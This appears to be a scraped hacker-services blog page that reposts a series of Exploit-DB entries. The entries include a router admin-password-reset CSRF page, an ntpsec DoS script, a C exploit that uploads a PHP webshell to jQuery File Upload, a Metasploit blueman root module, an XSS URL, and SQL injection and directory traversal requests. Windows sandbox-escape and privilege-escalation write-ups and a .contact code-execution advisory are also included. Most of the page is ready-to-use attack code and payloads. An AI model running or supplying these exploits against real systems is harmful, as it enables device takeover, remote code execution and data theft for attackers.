<!--
# Exploit Title: Coship Wireless Router – Unauthenticated Admin Password Reset
# Date: 15.01.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (Wifi Router)
# Affected Versions : Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-6441
# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on “Submit request”
# Password of the admin will now be changed as "password123"
# PoC :
-->
<html>
<!-- Change the X.X.X.X with the router's IP address -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://X.X.X.X/apply.cgi" method="POST">
<input type="hidden" name="page" value="regx/management/accounts.asp" />
<input type="hidden" name="http_username" value="admin" />
<input type="hidden" name="http_passwd" value="password123" />
<input type="hidden" name="usr_confirm_password" value="password123" />
<input type="hidden" name="action" value="Submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863588222
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-oobwrite
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: all versions of ntpsec including, and prior to 1.1.2.
# CVE: CVE-2019-6442
# Note: this PoC uses Keyid 1 with password ‘gurka’
import sys
import socket
buf = ("\x16\x08\x00\x03\x00\x00\x00\x00\x00\x00\x01\xd4\x6c\x65\x61\x6d" +
"\x3d\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" +
"\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x34\x41\x41\x42" +
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41" +
"\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41" +
"\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" +
"\x42\x42\x42\x42\x42\x31\x32\x33\x34\x35\x3e\x37\x38\x39\x30\x31" +
"\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37" +
"\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d\x36\x33" +
"\x34\x35\x36\x37\x38\x39\x30\x31\x32\x38\x3d\x20\x2d\x36\x4a\x0a" +
"\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x0a\x34\x35\x36" +
"\x37\x38\x39\x0a\x0a\x0a\x26\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" +
"\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a" +
"\x42\x42\x42\x54\x42\x42\x41\x41\x41\x34\x41\x41\x42\x42\x42\x42" +
"\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41" +
"\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a" +
"\x41\x41\x41\x41\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x25\x42" +
"\x42\x41\x41\x41\x0a\xae\x4a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x08" +
"\x0a\x2b\x0a\x0a\x0a\x34\x35\x36\x37\x38\x39\x0a\x0a\x0a\x26\x0a" +
"\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" +
"\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a\x42\x42\x42\x54\x42\x42\x41\x41" +
"\x41\x34\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41" +
"\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a" +
"\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x41\x41\x41\x41\x57\x41\x42\x42" +
"\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x0a\x42\x42\x42" +
"\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x41\x41\x41\x43" +
"\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a" +
"\x0a\x0a\x05\xff\xff\x05\x0a\x64\x1b\x0a\x0a\x0a\x2b\x0a\x0a\x0a" +
"\x0a\x0a\x41\x41\x41\x41\x41\x41\x41\x41\x41\x33\x34\x00\x00\x00" +
"\x80\x39\x30\x20\x32\x33\x34\x35\x36\x37\x38\x39\x30\x41\x5b\x41" +
"\x00\x00\x00\x01\x8f\x2c\x6e\x5b\x49\xe7\xa0\x78\xa1\x9b\x50\xf5" +
"\xb2\x18\x04\x00")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
# Exploit Title: Exploit for Blueimp's jQuery File Upload <= 9.22.0 CVE-2018-9206
# Google Dork: inurl: /jquery-file-upload/server/php
# Date: 1/15/2019
# Exploit Author: Larry W. Cashdollar
# Vendor Homepage: http://www.vapidlabs.com
# Software Link: [download link if available]
# Version: <= 9.22.0
# Tested on: Linux
# CVE : CVE-2018-9206
/*Exploits CVE-2018-9206 to install a webshell.*/
/*http://www.vapidlabs.com/advisory.php?v=204 */
/*$ gcc main.c -o blue_exploit */
/*Larry W. Cashdollar @_larry0*/
#include <stdio.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>
#include <unistd.h>
#define BSIZE 1024
#define DEBUG 1
#define TESTONLY 0
void build_string (char *p, char *path, char *arg, char *ar1, int func);
int
main (int argc, char *argv[])
{
int sock = 0, bytes_read = 0, total = 0, function = 0;
struct sockaddr_in serv_addr;
char buffer[BSIZE] = { 0 }, payload[BSIZE] = { 0};
if (argc <= 1)
{
printf
("CVE-2018-9206 Exploit\n@_larry0\nUsage: %s hostname port path command\n",
argv[0]);
return (0);
}
if (argc == 5)
function = 1;
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
printf ("\nSocket creation error\n");
return (-1);
}
build_string (payload,argv[3] ,argv[1], argv[4], function);
if (!TESTONLY){
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons (atoi (argv[2]));
if (inet_pton (AF_INET, argv[1], &serv_addr.sin_addr) <= 0)
{
printf ("\nInvalid address.\n");
return (-1);
}
if (connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr)) < 0)
{
printf ("\nConnection Failed.\n");
return (-1);
}
send (sock, payload, strlen (payload), 0);
}
if (DEBUG)
printf ("\nSending Payload:\n%s", payload);
if (!TESTONLY) {
while (1)
{
bytes_read = recv (sock, buffer, BSIZE, 0);
total += bytes_read;
if (bytes_read <= 0)
break;
printf ("%s", buffer);
bzero (buffer, BSIZE);
}
printf ("\n[+] Total bytes read: %d\n", total);
close (sock);
}
return (0);
}
void
build_string (char *p, char *path,char *arg, char *ar1, int func)
{
if (func)
snprintf (p, BSIZE,
"GET /%s/files/shell.php?cmd=%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\n\r\n", path,ar1, arg);
else
snprintf (p, BSIZE,
"POST /%s/index.php HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\nContent-Length: 244\r\nContent-Type: multipart/form-data; boundary=------------------------c8e05c8871143853\r\n\r\n--------------------------c8e05c8871143853\r\nContent-Disposition: form-data; name=\"files\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php $cmd=$_GET['cmd']; system($cmd);?>\r\n\r\n--------------------------c8e05c8871143853--\r\n\r\n",path, arg);
}
/*
The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF.
PoC:
*/
function gc() {
for (let i = 0; i < 10; i++) {
new ArrayBuffer(1024 * 1024 * 10);
}
}
function opt(arr) {
let r = /a/;
let o = {};
arr[0].charAt(0);
arr[1].charAt(0);
arr[2].charAt(0);
arr[3].charAt(0);
arr[4].charAt(0);
arr[5].charAt(0);
arr[6].charAt(0);
arr[7].charAt(0);
arr[8].charAt(0);
arr[8].charAt(0);
arr[9].charAt(0);
o.x = 'a'.match(r);
return o;
}
function main() {
for (let i = 0; i < 10000; i++) {
opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);
}
let a = 'a'.repeat(1024 * 1024 * 2);
let b = 'a'.repeat(1024 * 1024 * 2);
let arr = [];
for (let i = 0; i < 10; i++) {
arr[i] = a + b;
}
gc();
let o = opt(arr);
gc();
let tmp = [1234];
print(o.x); // 1234
}
main();
# Exploit Title: [Cross-site Scripting (XSS)]
# Date: [2019-01-15]
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
# Version: [12.2.1.3] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [CVE-2019-2413]
POC:
https://<ip>/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'blueman set_dhcp_handler D-Bus Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges by exploiting a Python
code injection vulnerability in blueman versions prior to 2.0.3.
The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
`set_dhcp_handler` function which uses user input in a call to `eval`,
without sanitization, resulting in arbitrary code execution as root.
This module has been tested successfully with blueman version 1.23
on Debian 8 Jessie (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'the grugq', # Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2015-12-18',
'References' =>
[
['BID', '79688'],
['CVE', '2015-8612'],
['URL', 'https://twitter.com/thegrugq/status/677809527882813440'],
['URL', 'https://github.com/blueman-project/blueman/issues/416'],
['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'],
['URL', 'https://www.debian.org/security/2015/dsa-3427'],
['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'],
['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085']
],
'Platform' => ['linux'],
'Arch' =>
[
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultTarget' => 0))
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def dbus_send(dest:, type:, path:, interface:, contents:)
cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
end
def check
unless command_exists? 'dbus-send'
vprint_error 'dbus-send is not installed. Exploitation will fail.'
return CheckCode::Safe
end
vprint_good 'dbus-send is installed'
res = dbus_send(
dest: 'org.blueman.Mechanism',
type: 'method_call',
path: '/',
interface: 'org.freedesktop.DBus.Introspectable.Introspect',
contents: ''
)
unless res.include? 'EnableNetwork'
vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available'
return CheckCode::Safe
end
vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available'
res = execute_python('')
unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
vprint_error 'Target is not vulnerable'
return CheckCode::Safe
end
CheckCode::Vulnerable
end
def execute_python(code)
dbus_send(
dest: 'org.blueman.Mechanism',
type: 'method_call',
path: '/',
interface: 'org.blueman.Mechanism.EnableNetwork',
contents: "'string:[]' 'string:[]' 'string:#{code}'"
)
end
def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
payload_name = ".#{rand_text_alphanumeric 10..15}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
print_status 'Executing payload...'
res = execute_python "os.system(\"#{payload_path}&\")"
vprint_line res
unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
fail_with Failure::NotVulnerable, 'The target is not vulnerable'
end
if res.include? 'SyntaxError:'
fail_with Failure::Unknown, 'Payload execution failed due to syntax error'
end
end
end
Windows: XmlDocument Insecure Sharing Elevation of Privilege
Platform: Windows 10 1809 (almost certainly earlier versions as well).
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): AppContainer Sandbox
Summary:
A number of Partial Trust Windows Runtime classes expose the XmlDocument class across process boundaries to less privileged callers which in its current form can be used to elevate privileges and escape the Edge Content LPAC sandbox.
Description:
When an AppContainer sandboxed application creates a partial trust class it’s instantiated inside a Runtime Broker running at the normal user privilege. While Windows.Data.Xml.Dom.XmlDocument is marked as Base Trust so would be instantiated inside the same process as the creator, there’s a number of partial trust classes which expose a XmlDocument object.
An example of this is the ToastNotificationManager class which expose a XmlDocument through the GetTemplateContent static method. This is exposed to all normal AC and also has explicit permissions to allow lpacAppExperience capability to access it which all Edge Content LPAC processes have.
The problem with XmlDocument is it doesn’t custom marshal the object over process boundaries, this means that the XmlDocument which is created by ToastNotificationManager stays in the Runtime Broker. If there’s any security issues with the use of XmlDocument interface then that’s a problem.
Looking at the class it’s implemented inside msxml6.dll and is basically a MSXML.DOMDocument.6.0 class in all but name. Checking what interfaces the class supports you find the following (partial list):
IPersistMoniker
IPersistStream
IPersistStreamInit
IServiceProvider
IStream
IXMLDOMDocument
IXMLDOMDocument2
IXMLDOMDocument3
IXMLDOMNode
Windows::Xml::Dom::IXmlDocument
Windows::Xml::Dom::IXmlDocumentIO
Windows::Xml::Dom::IXmlDocumentIO2
Windows::Xml::Dom::IXmlNode
Windows::Xml::Dom::IXmlNodeSelector
Windows::Xml::Dom::IXmlNodeSerializer
What sticks out is it supports IXMLDOMDocument* which is the normal MSXML interfaces. Even if the underlying implementation was based on the existing MSXML DOM Document I’d have expected that creating this object as a runtime object would wrap the MSXML object and only expose those interfaces needed for its use as a runtime object. However, it exposes everything.
Potential issues with this are:
IPersistMoniker could be used to save to a file with normal user privileges.
IXMLDOMDocument supports a save method which can do the same thing.
You can access the transformNode method to execute an XSLT template including arbitrary WSH script code (this is the _really_ bad one).
So the easiest way to escape the sandbox would be to execute the XSLT script. As the script is running in the Runtime Broker it runs with full user privileges and so can trivially escape the sandbox including the Edge Content LPAC sandbox.
The other classes which expose an XmlDocument:
ToastNotification via the get_Content method.
BadgeUpdateManager via the GetTemplateContent method.
TileFlyoutUpdateManager again via GetTemplateContent.
TileUpdateManager...
You can work out the rest, I’ve got better things to do.
Note that I think even if you remove all non-runtime interfaces exposed from XmlDocument just the built in functionality might be dangerous. For example you can call XmlDocument::loadXML with the ResolveExternals load setting which would likely allow you to steal files from the local system (a local XXE attack basically). Also I’m not entirely convinced that SaveToFileAsync is 100% safe when used OOP. It just calls StorageFile::OpenAsync method, in theory if you could get a StorageFile object for a file you can’t write to, if there’s normally a check in OpenAsync then that could result it an arbitrary file being overwritten.
Fixing wise at the least I’d wrap XmlDocument better so that it only exposes runtime interfaces. In the general case I’d also consider exposing XmlDocument over a process boundary to be dangerous so you might want to try and do something about that. And alternative would be to implement IMarshal on the object to custom marshal the XML document across the process boundary so that any calls would only affect the local process, but that’d almost certainly introduce perf regressions as well as appcompat issues. But that’s not my problem.
Proof of Concept:
I’ve provided a PoC as a solution containing the C# PoC as well as a DLL which can be injected into Edge to demonstrate the issue. The PoC will inject the DLL into a running MicrosoftEdgeCP process and run the attack. Note that the PoC needs to know the relative location of the ntdll!LdrpKnownDllDirectoryHandle symbol for x64 in order to work. It should be set up for the initial release of RS5 (17763.1) but if you need to run it on another machine you’ll need to modify GetHandleAddress in the PoC to check the version string from NTDLL and return the appropriate location (you can get the offset in WinDBG using ‘? ntdll!LdrpKnownDllDirectoryHandle-ntdll). Also before you ask, the injection isn’t a CIG bypass you need to be able to create an image section from an arbitrary file to perform the injection which you can do inside a process running with CIG.
1) Compile the solution in “Release” mode for “Any CPU”. It’ll need to pull NtApiDotNet from NuGet to build.
2) Start a copy of Edge (ensure it’s not suspended).
3) Execute the PoC from the x64\Release directory.
Expected Result:
Accessing the XmlDocument provides no elevated privileges.
Observed Result:
Notepad executes outside the sandbox.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46185.zip
Windows: RestrictedErrorInfo Unmarshal Section Handle UAF EoP
Platform: Windows 10 1709/1809
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
Summary:
The WinRT RestrictedErrorInfo doesn’t correctly check the validity of a handle to a section object which results in closing an unrelated handle which can lead to EoP.
Description:
The RestrictedErrorInfo class is a COM object implemented internal to the COM runtime. It’s used to pass structured error information across WinRT apartment and process boundaries. For that reason it supports a custom marshaling protocol and as it’s part of the system infrastructure it also marked a system trusted marshaler. It can be sent to processes which explicitly prevent custom marshaling such as many system services as well as AppContainer processes.
To send larger amounts of information such as the stack trace (and perhaps for security reasons) the marshaler will insert the name of a section object as well as a handle to that object into the marshaled stream. As COM marshaling doesn’t directly support passing handles, at least without additional help, the unmarshal code opens the client process and duplicates a SYNCHRONIZE only handle to the section into that process. The presumed idea behind passing this handle is it can be used to verify the section name is not some arbitrary section object. This validation takes place in the following code:
HRESULT CRestrictedError::ValidateHandle(
HANDLE hSection, const wchar_t *pszSectionName, unsigned int cchSectionName)
{
if ( !hSection && !*pszSectionName )
return S_OK;
ULONG length;
NTSTATUS status = NtQueryObject(hSection, ObjectNameInformation, NULL, NULL, &length);
if (status == STATUS_INFO_LENGTH_MISMATCH )
{
PUNICODE_STRING name = malloc(length);
NtQueryObject(hSection, ObjectNameInformation, name, length, NULL);
ULONG total_length = name->Length / 2;
if (length < 60)
return E_INVALID_ARG;
LPWSTR str = name.Buffer[name->Length - 60 * 2];
if (wmemcmp(L"RestrictedErrorObject-", str, 22))
return E_INVALID_ARG;
size_t name_length = wcslen(pszSectionName);
if (wmemcmp(pszSectionName, str, name_length))
return E_INVALID_ARG;
return S_OK;
}
return E_ERROR;
}
ValidateHandle takes the handle from the marshaled data and uses NtQueryObject to get its object name. This name, minus any leading name information is then compared against the passed in section name. If they’re not equal then this function fails and the section information is ignored. There’s two issues with this code, firstly it just checks the last 60 characters of the string matches “RestrictedErrorObject-” plus an arbitrary suffix. Secondly, and most importantly, it doesn’t verify that the handle is a section object, it just verifies the name.
This might not be a major issue except that once the handle is validated the code assumes ownership of the handle. Therefore once the code is finished with the handle, which can be in the unmarshaler or when the RestrictedErrorInfo object is released, the handle will be closed. If the handle is set to a pre-existing handle inside the unmarshaling process, as long as it meets the name requirements the handle will be closed and the handle entry opened for reuse. This can lead to a UAF on an arbitrary handle.
One way of exploiting this would be to attack the BITS service which as demonstrated many times is a good privileged target for these sorts of attacks:
1) Create a job writing a file to the path “C:\RestrictedErrorObject-PADDING\OUTPUT.TXT”. This results in BITS creating a temporary file “C:\RestrictedErrorObject-PADDING\BITSXXXX.tmp”.
2) Start the job and stall the GET request for the HTTP data, this is easy to do by requesting BITS downloads a URL from localhost and setting up a simple HTTP server.
3) BITS now has an open, writable handle to the temporary file which the last 60 characters is of the form “RestrictedErrorObject-PADDING\BITSXXXX.tmp”.
4 ) Marshal an error object, specifying the handle value for the temporary file (might have to brute force) and the section name using the name from 3. Send it to the BITS service using whatever mechanism is most appropriate. As the downloading is happening in a background thread the COM service is still accessible.
5) The unmarshaler will verify the handle then close the handle. This results in the stalled download thread having a stale handle to the temporary file.
6) Perform actions to replace the handle value with a different writable file, one which the user can’t normally write to.
7) Complete the GET request to unblock the download thread, the BITS service will now write arbitrary data to the handle.
As the download thread will close the arbitrary handle, instead of 6 and 7 you could replace the handle with some other resource such as a token object and then get a UAF on a completely arbitrary handle type leading to other ways of exploiting the same bug.
From a fixing perspective you really should do a better job of verifying that the handle is a section object, although even that wouldn’t be foolproof.
Proof of Concept:
I’ve provided a PoC as a C# project. Note that this doesn’t do an end to end exploit, it just demonstrates the bug in the same process as it’s a more reliable demonstration. This shouldn’t be a problem but if you really can’t see this is a security issue then… The PoC will create a file which will match the required naming pattern, then insert that into the marshaled data. The data will then be unmarshaled and the handle checked. Note that I release the COM object explicitly rather than waiting for the garbage collector as the handle is only released when the underlying COM object is released. For an attack on a native service this would not be necessary, but it’s mostly a quirk of using C#.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Run the PoC.
Expected Result:
The unmarshal process should fail, or the handle is valid after the unmarshal process.
Observed Result:
The unmarshal process succeeds and the second call to obj.FullPath fails with an STATUS_INVALID_HANDLE error.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46184.zip
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft .CONTACT File
A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista.
This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.
[Vulnerability Type]
Insufficient UI Warning Arbitrary Code Execution
[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
e.g.
<c:Url c:ElementID="xxxxxxxxxxxxxxxxxxxxxxxx"><c:Value>www.hyp3rlinx.altervista.com</c:Value>
Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
[Exploit/POC]
Rename any executable file extension from ".exe" to ".com" to be like a valid web domain name.
Create a directory to house the executable file
Modify the contact file website link like ---> http.\\www.<executable-name>.com
Contact website link now points at "dir .\ executable" ---> http.\\www.<executable-name>.com
Compress the files using archive utility and place in webserver for download.
[POC Video URL]
https://vimeo.com/311759191
[Disclosure Timeline]
Reported to ZDI 2018-11-30
This exact same vulnerability exists and affects Microsoft Windows .VCF files sharing the same root cause and was publicly disclosed 2019-01-10.
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
Public disclosure : January 16, 2019
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: phpTransformer 2016.9 - SQL Injection
# Dork: N/A
# Date: 2019-01-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://phptransformer.com/
# Software Link: https://netcologne.dl.sourceforge.net/project/phptransformer/Version%202016.9/release_2016.9.zip
# Version: 2016.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/Programs/news/GeneratePDF.php?Lang=English&idnews=[SQLL]
#
# /[PATH]/Programs/news/GeneratePDF.php
#41 if(isset($_GET['idnews'])) {
#42 $IdNews = InputFilter($_GET['idnews']);
#43 $Lang = InputFilter($_GET['Lang']);
#44 // get idLang
#45 SqlConnect();
#46 ExcuteQuery('SELECT `IdLang` FROM `languages` WHERE `LangName`="'.$Lang.'";');
#47 if ($TotalRecords>0) {
#48 require_once('../../languages/lang-'.$Lang.'.php');
#49 $IdLang= $Rows['IdLang'];
#50 //GET NEWS DATE
#51 ExcuteQuery('SELECT * FROM `news` WHERE `IdNews`="'.$IdNews.'";');
#52 if ($TotalRecords>0) {
#53 $Date = $Rows['Date'];
#54 }
#55 else {
#56 $Date = Date('Y-m-d');
#57 }//end if
/* `exploitdb`.`users` */
$users = array(
array('UserId' => '200700000-1'....'UserName' => 'admin'....'PassWord' => '21232f297a57a5a743894a0e4a801fc3'....)
);
GET /[PATH]/Programs/news/GeneratePDF.php?Lang=English&idnews=20190000000%27%20%41%4e%44%20%53%4c%45%45%50%28%35%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: TryLogin=0; PHPSESSID=2hsc4lr80e0lv14jorun0bs390; browserupdateorg=pause; phpwcmsBELang=en; phpwcmsBEItemsPerPage=25; Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156; phpTransformer=9th36daohkgnuoqm0mmck5her6; phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22; TawkConnectionTime=0; __tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 22:43:00 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# Exploit Title: phpTransformer 2016.9 - Directory Traversal
# Dork: N/A
# Date: 2019-01-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://phptransformer.com/
# Software Link: https://netcologne.dl.sourceforge.net/project/phptransformer/Version%202016.9/release_2016.9.zip
# Version: 2016.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../
#
GET /[PATH]/phpTransformer-2016.9-Directory-raversal.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2hsc4lr80e0lv14jorun0bs390; browserupdateorg=pause; phpwcmsBELang=en; phpwcmsBEItemsPerPage=25; Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156; phpTransformer=9th36daohkgnuoqm0mmck5her6; phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22; TawkConnectionTime=0; __tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 23:19:59 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
